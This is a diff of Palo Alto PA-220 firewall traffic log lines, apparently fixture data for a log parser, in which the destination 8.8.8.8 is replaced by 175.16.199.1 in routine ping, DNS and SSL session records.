-Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United 
States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,184.51.253.193,192.168.1.63,184.51.253.193,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:41 PA-220 1,2018/11/30 
16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,199.167.55.52,192.168.1.63,199.167.55.52,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,199.167.52.219,192.168.1.63,199.167.52.219,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,52.71.117.196,192.168.1.63,52.71.117.196,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.194.41,192.168.1.63,35.186.194.41,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.124.9,192.168.1.63,35.201.124.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.131.237,192.168.1.63,100.24.131.237,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 
16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 
16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 
16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 